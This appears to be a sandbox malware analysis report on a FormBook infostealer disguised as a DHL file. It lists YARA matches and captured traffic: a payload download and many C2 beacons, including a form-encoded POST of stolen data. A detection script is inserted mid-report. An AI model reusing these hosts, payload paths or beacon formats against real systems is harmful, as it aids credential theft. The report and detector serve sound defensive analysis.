Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sv.symcd.com0&
Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000001.00000003.4690708981.00000000029A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: DHLIN00178.exe, 00000005.00000001.5907937864.0000000000649000.00000020.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.gopher.ftp://ftp.
Source: DHLIN00178.exe, 00000005.00000001.5907937864.0000000000626000.00000020.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.nero.com
Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.symauth.com/cps0(
Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.symauth.com/rpa00
Source: DHLIN00178.exe, 00000005.00000001.5907937864.00000000005F2000.00000020.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: DHLIN00178.exe, 00000005.00000001.5907937864.00000000005F2000.00000020.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: DHLIN00178.exe, 00000001.00000003.4687395558.00000000029AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/cps0%
Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/rpa0
Source: DHLIN00178.exe, 00000001.00000003.4687395558.00000000029AC000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000001.00000003.4688853178.00000000029AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/dotnet/runtime
Source: DHLIN00178.exe, 00000005.00000001.5907937864.0000000000649000.00000020.00000001.01000000.00000005.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org0
Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000001.00000003.4690708981.00000000029A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown HTTP traffic detected: POST /i9th/ HTTP/1.1 Host: www.sem-jobs.com Connection: close Content-Length: 190 Cache-Control: no-cache Origin: http://www.sem-jobs.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.sem-jobs.com/i9th/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 65 67 39 4a 56 77 34 79 3d 7e 35 74 6f 4e 35 68 77 70 35 51 6a 61 45 58 30 7e 33 66 36 74 69 37 37 72 76 54 68 67 48 7a 74 39 69 7a 4f 78 63 4c 6c 36 71 78 58 36 4b 49 62 6b 33 4a 6f 58 55 76 57 4b 5f 39 64 43 66 6e 45 7e 32 6c 70 30 4d 71 59 56 78 71 64 43 35 62 63 39 57 56 4f 6f 68 37 30 6b 73 34 37 6a 45 59 7a 41 66 59 57 49 4d 58 30 57 6f 64 36 72 64 45 49 63 5f 67 53 52 4c 6b 7a 36 62 4c 64 34 58 4e 54 75 47 47 68 36 49 55 50 68 56 51 62 38 50 74 6f 50 35 4a 71 71 4f 6b 6a 7e 41 52 38 31 54 50 56 57 34 32 6a 44 73 41 72 4f 31 47 79 36 72 6a 6e 33 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: eg9JVw4y=~5toN5hwp5QjaEX0~3f6ti77rvThgHzt9izOxcLl6qxX6KIbk3JoXUvWK_9dCfnE~2lp0MqYVxqdC5bc9WVOoh70ks47jEYzAfYWIMX0Wod6rdEIc_gSRLkz6bLd4XNTuGGh6IUPhVQb8PtoP5JqqOkj~AR81TPVW42jDsArO1Gy6rjn3w).
Source: unknown DNS traffic detected: queries for: machupichuturismo.com
Source: C:\Windows\explorer.exe Code function: 7_2_0E1E84B2 getaddrinfo,SleepEx,setsockopt,recv,recv,
Source: global traffic HTTP traffic detected: GET /bBbWIWXVMfEPUqiMugc81.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:111.0) Gecko/20100101 Firefox/111.0 Host: machupichuturismo.com Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=PDhFruS31XQUb4y36+furUas2tGpUbYkRl+Vt3Aa+IAT3kg40wU83JEX1Y8JNHLK9JPMefgRvvrtwUOOtwZiCVeSdeNGXRAYpw== HTTP/1.1 Host: www.sandyhillsagritourism.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i9th/?eg9JVw4y=z7FIOMl2i6pYQmyH2ErzvRvTq7+wkT+xjTHk/876j4Q/5vAls38NbxDvDu1KKOzJ/k110/24aT2WAbPRlApsmRrAhaQg7G9jLg==&WsTjx=NuByY HTTP/1.1 Host: www.sem-jobs.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=k6CZcF1ZzBrKa1yLo5gUvle0ANnyvLBM7QyaLf2rdBQJTudoAeDS0wYpaDY8EKJddZnFAls+GzNjbQwIPoLL7cj/l4B8r0J0qw== HTTP/1.1 Host: www.casinoenligne-france.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i9th/?eg9JVw4y=QFexSP2v0Nfahq1S1liqATm5JxjoDmOPLniWa5ukQb1HIcv0ZKrmbVZaJMRsWG1ma9D40wKdkkU/v7zCXk+Vmaqrz8TPF5AIjg==&WsTjx=NuByY HTTP/1.1 Host: www.37123.vip Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=7TOFWM92qV6pcrPqADbwGQbE1m3eI0WOEQ27vaT62sOH8JmND2m/uvMqxI1JrYebWMYnTtk64dqQKbYLv2YomR00aJ+FLC/PKQ== HTTP/1.1 Host: www.adasoft.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i9th/?eg9JVw4y=a+ho0UoyjOnZk1lCGpcoaGjEnGbmKf9IFFNpvRdd6kC+DJQ8bYOFaRfvJPIieJPEPcY1cGGv0mjDAZsn1ciiV+plF0lWDSd4aQ==&WsTjx=NuByY HTTP/1.1 Host: www.hhkk143.cfd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=2Tzmt/R719tLBul7mSD638d/x74EcSC92+f/k2zWdQLWTlIxfL/M90/j5x2SA2nsSzi8rNl8g04ZV+bWcvwPkAs6VEt+1VDvVA== HTTP/1.1 Host: www.popcors.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i9th/?eg9JVw4y=zQVcsXcgs6FIBsavZKdNfD9L9IyDn+uX2155hsx4ti6GChTIuvpprxYWozt816wf2SlZqQ0WfllzqwVqRSAw6movAhpuxOp8gg==&WsTjx=NuByY HTTP/1.1 Host: www.spotcheck.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=skpIeuUmXVtlsTBo2HC5tT/aGHmA0xfCvZmPrRJBNh0Q4R2Cj+Wk81Dgip66N6Ewmv0qryLoIL5Vk4bBbPirrB4g3sIArb9fSw== HTTP/1.1 Host: www.dinggubd.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i9th/?eg9JVw4y=e0G7KvvSnXpGXx+R6TzWFmwlzMjwM1CfwQYDrhzCOtfsddq8ukik0UKA2v6ej/ZrW3TOdSCJ2lVMgjL9UMLlhRMn0e8ae0vL4Q==&WsTjx=NuByY HTTP/1.1 Host: www.hot6s.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=uGolGY6UqX3sY/9PLVWwN9J/BTzz+6hffrhecVGN5FjI635Z0j5At+r+BPTklOB2HfIE21jETmQJryl68L/U0+pl2AIDG80kBg== HTTP/1.1 Host: www.0w3jy.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i9th/?eg9JVw4y=lqJURYfuPjuznURrThj0aNiAAsaH1/tf+kf9L6kKBxqjEkH5T6yZpcUSZY6yP89JvXg35e6PTbHFvlwlO73OfbEtyEO8MEspLQ==&WsTjx=NuByY HTTP/1.1 Host: www.cmproutdoors.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=f7i/reR9z/XYtiufs4T2oCglTJHppPIhAuHFUSLntHIlLxYI6+YKRHThES4heztnev1TOQxmA1eDErfm329tx1/Ku+4bHpf60w== HTTP/1.1 Host: www.daon3999.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i9th/?eg9JVw4y=oRug1p2N3M7f21OO0lOBGqE4PfaV2grEv9VY5puRv4+mIhzAnHI5ZAphwtkKSkIVc0m4kQAL+gvPk8R76uitxElzOZBQuGepJQ==&WsTjx=NuByY HTTP/1.1 Host: www.5319ss.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=djsn1an+GmzwXFTB/MFsKGQXJOZQhusBpj6p6RqECbOdtpCOv2Kvcnth4kqs1edHWjVNJqZCDFfEwc47KO0/1j4B7gbgnVo+SQ== HTTP/1.1 Host: www.riverflow.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i9th/?eg9JVw4y=k3d2rpkNYMKNWaTFA3t0FG4YoWbTiA9z8X9PQFaufAL9B597B9+6rAPLCs31mdZA/v+HUWU5or1J0geLcv9LMooOfPEJdI/q3g==&WsTjx=NuByY HTTP/1.1 Host: www.verde-amar.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=PDhFruS31XQUb4y36+furUas2tGpUbYkRl+Vt3Aa+IAT3kg40wU83JEX1Y8JNHLK9JPMefgRvvrtwUOOtwZiCVeSdeNGXRAYpw== HTTP/1.1 Host: www.sandyhillsagritourism.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /i9th/?eg9JVw4y=z7FIOMl2i6pYQmyH2ErzvRvTq7+wkT+xjTHk/876j4Q/5vAls38NbxDvDu1KKOzJ/k110/24aT2WAbPRlApsmRrAhaQg7G9jLg==&WsTjx=NuByY HTTP/1.1 Host: www.sem-jobs.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: C:\Users\user\Desktop\DHLIN00178.exe Code function: 1_2_0040523F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
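The traffic above shows the FormBook C2 pattern worth detecting generically rather than by domain: the same URI path (/i9th/) with the same two query parameter names (WsTjx, eg9JVw4y) is sent as a short GET with Connection: close to a long list of hosts, most of which are decoys, followed by a form-encoded POST to the path on the host that answered. The script below is an added example, not part of the Joe Sandbox report and not FormBook's own code; it parses raw HTTP requests, groups GETs by (path, parameter names) and flags a shape that is beaconed to several distinct hosts. The function names, the min_hosts threshold and the sample requests are constructed for the example; the parameter values in the samples are shortened placeholders, not the sandbox's bytes.

```python
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample requests in raw HTTP form. Hosts, the /i9th/ path and the
# parameter names WsTjx / eg9JVw4y come from the traffic listed above; the
# parameter values are shortened placeholders, not the sandbox's bytes.
SAMPLE_REQUESTS = [
    "GET /i9th/?WsTjx=NuByY&eg9JVw4y=PDhFruS31X HTTP/1.1\r\n"
    "Host: www.sandyhillsagritourism.com\r\nConnection: close\r\n\r\n",
    "GET /i9th/?eg9JVw4y=z7FIOMl2i6&WsTjx=NuByY HTTP/1.1\r\n"
    "Host: www.sem-jobs.com\r\nConnection: close\r\n\r\n",
    "GET /i9th/?WsTjx=NuByY&eg9JVw4y=k6CZcF1ZzB HTTP/1.1\r\n"
    "Host: www.casinoenligne-france.info\r\nConnection: close\r\n\r\n",
    "POST /i9th/ HTTP/1.1\r\nHost: www.sem-jobs.com\r\nConnection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 16\r\n\r\n"
    "eg9JVw4y=~5toN5h",
    # The GuLoader payload fetch: one host, no query string, so it is not grouped.
    "GET /bBbWIWXVMfEPUqiMugc81.bin HTTP/1.1\r\nHost: machupichuturismo.com\r\n"
    "Cache-Control: no-cache\r\n\r\n",
    # Ordinary browsing noise (constructed) that must not be flagged.
    "GET /index.html?q=1 HTTP/1.1\r\nHost: www.example.org\r\nConnection: keep-alive\r\n\r\n",
]


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query parameter names and headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    # Only the parameter names matter: FormBook keeps them fixed per build
    # while the values change on every beacon.
    names = {k for k, _ in parse_qsl(parts.query, keep_blank_values=True)}
    return {
        "method": method,
        "path": parts.path,
        "params": tuple(sorted(names)),
        "host": headers.get("host", ""),
        "headers": headers,
    }


def find_rotating_c2(raw_requests, min_hosts=3):
    """Return (path, parameter names) shapes sent as GETs to min_hosts or more distinct hosts."""
    hosts_by_shape = defaultdict(set)
    for raw in raw_requests:
        req = parse_request(raw)
        if req["method"] != "GET" or not req["params"]:
            continue
        hosts_by_shape[(req["path"], req["params"])].add(req["host"])
    findings = [
        {"path": path, "params": params, "hosts": sorted(hosts)}
        for (path, params), hosts in hosts_by_shape.items()
        if len(hosts) >= min_hosts
    ]
    return sorted(findings, key=lambda f: f["path"])


def posts_to_path(raw_requests, path):
    """Hosts that received a form-encoded POST to the beacon path: the exfiltration leg."""
    hosts = set()
    for raw in raw_requests:
        req = parse_request(raw)
        content_type = req["headers"].get("content-type", "")
        if (req["method"] == "POST" and req["path"] == path
                and content_type.startswith("application/x-www-form-urlencoded")):
            hosts.add(req["host"])
    return sorted(hosts)


if __name__ == "__main__":
    for hit in find_rotating_c2(SAMPLE_REQUESTS):
        print(f"{hit['path']} with params {hit['params']} beaconed to "
              f"{len(hit['hosts'])} hosts: {hit['hosts']}")
        print("  form POSTs to the same path:", posts_to_path(SAMPLE_REQUESTS, hit["path"]))
```

Keying on parameter names and path instead of host is what makes this survive the decoy list: in the report the same shape hits 17 different domains, while only www.sem-jobs.com receives the POST, so the combination of find_rotating_c2 and posts_to_path points at the live C2 without knowing any of the domains in advance. Proxy logs that strip query strings will need the threshold applied to the path alone.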

        E-Banking Fraud

Source: Yara match File source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

Source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: DHLIN00178.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5256 -s 284
Source: C:\Users\user\Desktop\DHLIN00178.exe Code function: 1_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\Desktop\DHLIN00178.exe Code function: 1_2_00406666
Source: C:\Windows\explorer.exe Code function: 7_2_0E1E5232
Source: C:\Windows\explorer.exe Code function: 7_2_0E1E5E32
Source: C:\Windows\explorer.exe Code function: 7_2_0E1E0C52
Source: C:\Windows\explorer.exe Code function: 7_2_0E1E127A
Source: C:\Windows\explorer.exe Code function: 7_2_0E1E2C72
Source: C:\Windows\explorer.exe Code function: 7_2_0E1E6F18
Source: C:\Windows\explorer.exe Code function: 7_2_0E1E5D12
Source: C:\Windows\explorer.exe Code function: 7_2_0E1E3FA2
Source: C:\Windows\explorer.exe Code function: 7_2_0E1E3FA0
Source: C:\Windows\explorer.exe Code function: 7_2_0E1E61D2
Source: C:\Windows\explorer.exe Code function: 7_2_0E1E77D2
Source: C:\Windows\explorer.exe Code function: 7_2_0E1E61CA
Source: C:\Windows\explorer.exe Code function: 7_2_0EDB4C52
Source: C:\Windows\explorer.exe Code function: 7_2_0EDB527A
Source: C:\Windows\explorer.exe Code function: 7_2_0EDB6C72
Source: C:\Windows\explorer.exe Code function: 7_2_0EDB9232
Source: C:\Windows\explorer.exe Code function: 7_2_0EDB9E32
Source: C:\Windows\explorer.exe Code function: 7_2_0EDBA1D2
Source: C:\Windows\explorer.exe Code function: 7_2_0EDBB7D2
Source: C:\Windows\explorer.exe Code function: 7_2_0EDBA1CA
Source: C:\Windows\explorer.exe Code function: 7_2_0EDB7FA2
Source: C:\Windows\explorer.exe Code function: 7_2_0EDB7FA0
Source: C:\Windows\explorer.exe Code function: 7_2_0EDBAF18
Source: C:\Windows\explorer.exe Code function: 7_2_0EDB9D12
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C7D480
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C10445
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CCF5C9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CC75C6
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CDA526
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CCA6C0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C0C6E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C836EC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CCF6F6
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C10680
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CBD646
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C34670
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C2C600
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CAD62C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CC6757
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C1A760
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C12760
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C1B0D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CC70F1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C4508C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C000A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CBE076
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C2B1E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04BFF113
